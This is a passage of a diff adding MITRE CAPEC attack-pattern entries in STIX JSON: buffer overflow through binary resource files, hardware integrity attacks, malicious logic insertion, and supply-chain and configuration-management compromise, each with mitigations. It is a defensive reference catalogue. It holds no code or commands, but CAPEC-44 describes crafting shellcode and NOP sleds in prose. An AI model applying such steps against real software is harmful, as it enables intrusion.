This can allow the adversary access to the execution stack and execute arbitrary code in the target process.", + "external_references": [ + { + "external_id": "CAPEC-44", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/44.html" + }, + { + "external_id": "CWE-120", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Overflow Binary Resource File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software" + ], + "x_capec_example_instances": [ + "Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the adversary has an excellent vector for wide distribution. 
There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target software: The adversary identifies software that uses external binary files in some way. This could be a file upload, downloading a file from a shared location, or other means.

Experiment

  1. Find injection vector: The adversary creates a malicious binary file by altering the header to make the file seem shorter than it is. Additional bytes are added to the end of the file to be placed in the overflowed location. The adversary then deploys the file to the software to determine if a buffer overflow was successful.

  2. Craft overflow content: Once the adversary has determined that this attack is viable, they will specially craft the binary file in a way that achieves the desired behavior. If the source code is available, the adversary can carefully craft the malicious file so that the return address is overwritten to an intended value. If the source code is not available, the adversary will iteratively alter the file in order to overwrite the return address correctly.

  3. Techniques
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Once the adversary has constructed a file that will effectively overflow the targeted software in the intended way. The file is deployed to the software, either by serving it directly to the software or placing it in a shared location for a victim to load into the software.

", + "x_capec_extended_description": "This attack pattern is a variant of standard buffer overflow attack using an unexpected vector (binary files) to wrap its attack and open up a new attack vector. The adversary is required to either directly serve the binary content to the victim, or place it in a locale like a MP3 sharing application for the victim to download. The adversary then is notified upon the download or otherwise locates the vulnerability opened up by the buffer overflow.", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software processes binary resource files.", + "Target software contains a buffer overflow vulnerability reachable through input from a user-controllable binary resource file." + ], + "x_capec_skills_required": { + "Medium": "To modify file, deceive client into downloading, locate and exploit remote stack or heap vulnerability" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform appropriate bounds checking on all buffers.", + "id": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--158ab2a0-3900-4c6d-a6b8-f70b277abce5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67074d87-d035-4907-8971-d22cf929a6a6", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fbdf6185-93ce-4ed8-b163-4441304d2cec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Static code analysis", + "id": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cb1919fb-3b75-486e-9e5c-c0319ac4b906", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3522f721-ee24-4278-806a-1288b6ca7ce2", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes", + "id": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "modified": "2022-02-22T00:00:00.000Z", + 
"name": "coa-44-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0901a46-1e3d-454b-aabc-5d7a0983c5b6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c9cdf1e-85f9-47f9-9628-f55b7c41c408", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Keep software patched to ensure that known vulnerabilities are not available for adversaries to target on host.", + "id": "course-of-action--83a440d9-6129-4c0c-b49c-61174d80b0e9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-44-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0230fb8-7e13-4a51-979e-255821af7f94", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--83a440d9-6129-4c0c-b49c-61174d80b0e9", + "target_ref": "attack-pattern--d3634072-88f9-4711-987f-6bff7698bd4c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in the 
system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-440", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/440.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Hardware Additions", + "external_id": "T1200", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1200" + } + ], + "id": "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Integrity Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_prerequisites": [ + "Influence over the deployed system at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. 
With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-441", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/441.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Malicious Logic Insertion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "attack-pattern--4cfba0b3-4740-49ae-bbb4-2dad27886239", + "attack-pattern--dc05cb9b-00ae-4fd0-8743-b1fb507ea1d3" + ], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. 
Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-442", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/442.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Marshall Brain, How Computer Viruses Work, 2007, MindPride", + "external_id": "REF-387", + "source_name": "reference_from_CAPEC", + "url": "http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm" + } + ], + "id": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c" + ], + "x_capec_prerequisites": [ + "Access to the software currently deployed at a 
victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.", + "external_references": [ + { + "external_id": "CAPEC-443", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/443.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Supply Chain Compromise: 
Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Ax Sharma, Dev corrupts NPM libs 'colors' and 'faker' breaking thousands of apps, 2022--01---09, BleepingComputer", + "external_id": "REF-704", + "source_name": "reference_from_CAPEC", + "url": "https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/" + }, + { + "description": "Alberto Pellitteri, Malicious modifications to open source projects affecting thousands, 2022--01---12, SysDig", + "external_id": "REF-705", + "source_name": "reference_from_CAPEC", + "url": "https://sysdig.com/blog/malicious-modifications-detection-sysdig/" + } + ], + "id": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Inserted Into Product by Authorized Developer", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In January 2022 the author of popular JavaScript packages \"Faker\" and \"colors\", used for generating mock data and including colored 
text within NodeJS consoles respectively, introduced malicious code that resulted in a Denial of Service (DoS) via an infinite loop. When applications that leveraged these packages updated to the malicious version, their applications executed the infinite loop and output gibberish ASCI characters endlessly. This resulted in the application being unusable until a stable version of the package was obtained. [REF-705]\n ", + "During initial development, an authorized hardware developer implants a malicious microcontroller within an Internet of Things (IOT) device and programs the microcontroller to communicate with the vulnerable device. Each time the device initializes, the malicious microcontroller's code is executed, which ultimately provides the adversary with backdoor access to the vulnerable device. This can further allow the adversary to sniff network traffic, exfiltrate date, execute unauthorized commands, and/or pivot to other vulnerable devices." + ], + "x_capec_extended_description": "\n Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In further cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries. 
It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and hardware during development and prior to deployment to ensure that it functions as intended and without any malicious functionality. This includes both initial development, as well as updates propagated to the product after deployment.", + "id": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-443-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53570d3-7395-4034-b882-85443c4d930f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "target_ref": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. 
The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-444", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/444.html" + } + ], + "id": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Development Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + 
"attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb" + ], + "x_capec_prerequisites": [ + "Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-444-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f05e05a-2eec-4147-a5b0-18b6c29ec5da", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "target_ref": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "type": "relationship", + "x_capec_version": "3.9" + 
}, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server.\n ", + "external_references": [ + { + "external_id": "CAPEC-445", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/445.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Chef Manage deserializes cookie data insecurely, 2016--05---17, Carnegie Mellon University", + "external_id": "REF-706", + "source_name": "reference_from_CAPEC", + "url": "https://www.kb.cert.org/vuls/id/586503" + } + ], + "id": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Configuration Management 
Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2016, the policy-based configuration management system Chef was shown to be vulnerable to remote code execution attacks based on its Chef Manage add-on improperly deserializing user-driven cookie data. This allowed unauthenticated users the ability to craft cookie data that executed arbitrary code with the web server's privileges. [REF-706]\n " + ], + "x_capec_extended_description": "\n Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the configuration management system during deployment or currently deployed at a victim location. 
This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.", + "id": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-445-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b2e787f-2034-4a16-8515-37dddac4930a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary conducts supply chain attacks by the inclusion of insecure third-party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer.\n ", + "external_references": [ + { + "external_id": "CAPEC-446", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/446.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Thomas Brewster, How Lenovo's Superfish 'Malware' Works And What You Can Do To Kill It, 2015--02---19, Forbes", + "external_id": "REF-707", + "source_name": 